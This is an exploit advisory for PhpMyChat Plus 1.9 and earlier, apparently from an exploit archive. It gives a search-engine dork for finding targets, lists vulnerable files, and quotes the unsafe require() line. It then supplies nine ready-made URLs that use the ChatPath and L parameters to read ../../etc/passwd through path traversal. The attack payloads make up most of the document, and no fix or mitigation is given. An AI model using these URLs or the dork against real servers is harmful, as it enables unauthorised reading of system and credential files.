a*******************************************************************************
# Title  :   PhpMyChat Plus  <= 1.9 Multiple Source Code Disclosure Vulnerabilities

# Author :   ajann

# Dork   :   phpMyChat plus

# Vuln;

*******************************************************************************
[Files]
avatar.php
colorhelp_popup.php
color_popup.php
index.php
index1.php
/lib/connected_users.lib.php
/lib/index.lib.php
logs.php
phpMyChat.php3
[/Files]

[Code,1]
connected_users.lib.php Error:

..
....
require("./${ChatPath}/lib/database/".C_DB_TYPE.".lib.php");
require("./${ChatPath}/lib/clean.lib.php");
....
..

Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] ChatPath=[file]
Key [:] L=[file]
Key [:] ChatPath=[file]


\Example:

http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd
http://target.com/path/index.php?ChatPath=../../etc/passwd
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://target.com/path/logs.php?L=../../etc/passwd
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd



# ajann,Turkey
# ...
# Im not Hacker!